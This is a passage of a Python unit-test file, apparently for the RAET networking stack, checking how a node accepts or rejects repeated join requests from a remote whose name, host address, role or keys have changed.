self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousRejectedRejectNewKeys(self):
'''
Test joinent rejects non-vacuous join request with new keys from already rejected estate (I1)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousRejectedRejectNewKeys.__doc__))
# Mode: Never, Once (use once as more loyal)
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
alpha.keep.rejectRemote(alphaRemote)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Old
# Keys: New
beta.local.signer = nacling.Signer()
beta.local.priver = nacling.Privateer()
beta.dumpLocalRole()
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Join with new keys
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, don't clear
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
# Assert role dump isn't changed
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousRejectedRejectNewRole(self):
'''
Test joinent rejects non-vacuous join request with new role from already rejected estate (I2)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousRejectedRejectNewRole.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
# Mutable: Yes
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
alpha.keep.rejectRemote(alphaRemote)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
beta.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Ensure alpha knows nothing about the new role
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Join with a new role
self.join(beta, alpha, deid=betaRemote.nuid)
alpha.keep.rejectRemote(alphaRemote)
# Action: Reject, don't clear
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousRejectedRejectSameAll(self):
'''
Test joinent rejects non-vacuous join request with same all from already rejected estate (J1)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousRejectedRejectSameAll.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
# Mutable: Either
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
alpha.keep.rejectRemote(alphaRemote)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Old
# Leid: Old
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
# Join with same all
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, Remove Clear
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert remote is cleared
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
# Assert role/keys aren't touched
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousRejectedRejectSameRoleKeys(self):
'''
Test joinent rejects non-vacuous join request with same role/keys from already rejected estate (J2)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousRejectedRejectSameRoleKeys.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
# Mutable: Yes
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
alpha.keep.rejectRemote(alphaRemote)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Either
# Main: Either
self.assertIs(beta.main, None)
beta.main = True
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Old
# Keys: Old
# Sameness: Same Role/Keys
# Join with same role/keys
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, clear remote data, don't touch role data
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert remote is cleared
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
# Assert role/keys aren't touched
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewName(self):
'''
Test mutable joinent accept non-vacuous join with an updated name (K1)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewName.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Vacuous: No
# Ephemeral: No Nuid (the Nuid is known)
# Perform an auto-accepted join
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Mutable: Yes
alpha.mutable = True
# Name: New
oldName = beta.name
newName = '{0}_new'.format(oldName)
beta.name = newName
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not SameAll
keep = self.copyData(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.name, newName)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(oldName)
self.assertIs(remoteData, None)
remoteData = alpha.keep.loadRemoteData(newName)
remoteData['ha'] = tuple(remoteData['ha'])
# Assert updated alphaRemote is dumped
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewMain(self):
'''
Test mutable joinent accept non-vacuous join with an updated main (K2)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewMain.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Vacuous: No
# Ephemeral: No Nuid (the Nuid is known)
# Perform an auto-accepted join
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Mutable: Yes
alpha.mutable = True
oldMain = None
newMain = True
# Name: Either
# Main: New
self.assertIs(beta.main, oldMain)
beta.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not SameAll
keep = self.copyData(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dumpt
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertIs(alphaRemote.main, newMain)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewKind(self):
'''
Test mutable joinent accept non-vacuous join with an updated kind (K3)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Vacuous: No
# Ephemeral: No Nuid (the Nuid is known)
# Perform an auto-accepted join
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Mutable: Yes
alpha.mutable = True
oldKind = beta.kind
newKind = oldKind + 10
# Name: Either
# Main: Either
# Kind: New
beta.kind = newKind
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not SameAll
keep = self.copyData(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertIs(alphaRemote.kind, newKind)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewRha(self):
'''
Test mutable joinent accept non-vacuous join with an updated remote host address (K4)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewRha.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Vacuous: No
# Ephemeral: No Nuid (the Nuid is known)
# Perform an auto-accepted join
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Mutable: Yes
alpha.mutable = True
# Name: Either
# Main: Either
# Kind: Either
# RHA: New
oldHa = beta.local.ha
newHa = (beta.local.ha[0], 7532)
self.assertNotEqual(oldHa, newHa)
# update beta HA
beta.server.close()
beta.ha = newHa
beta.local.ha = newHa
# recreate beta server socket
beta.server = beta.serverFromLocal()
reopenResult = beta.server.reopen()
self.assertTrue(reopenResult)
self.assertEqual(beta.server.ha, newHa)
self.assertEqual(beta.local.ha, newHa)
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not SameAll
keep = self.copyData(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.ha, newHa)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewFuid(self):
'''
Test mutable joinent accept non-vacuous join with an updated fuid (K5)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewFuid.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Vacuous: No
# Ephemeral: No Nuid (the Nuid is known)
# Perform an auto-accepted join
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Mutable: Yes
alpha.mutable = True
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: New
oldFuid = betaRemote.nuid
newFuid = oldFuid + 10
betaRemote.nuid = newFuid
beta.remotes[newFuid] = beta.remotes[oldFuid]
del beta.remotes[oldFuid]
# Leid: Old
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not SameAll
keep = self.copyData(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.fuid, newFuid)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewRole(self):
'''
Test mutable joinent accept non-vacuous join with an updated role (K6)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Vacuous: No
# Ephemeral: No Nuid (the Nuid is known)
# Perform an auto-accepted join
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Mutable: Yes
alpha.mutable = True
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: New
oldRole = 'beta'
newRole = 'beta_new'
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
beta.dumpLocalRole()
# Keys: Either
# Sameness: Not SameAll, Not Same Role/Keys
keep = self.copyData(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Ensure alpha knows nothing about the new role
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewKeys(self):
'''
Test mutable joinent accept non-vacuous join with an updated keys (K7)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewKeys.__doc__))
# Status: Accepted (auto accept keys)
# Vacuous: No
# Ephemeral: No Nuid (the Nuid is known)
# Perform an auto-accepted join
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
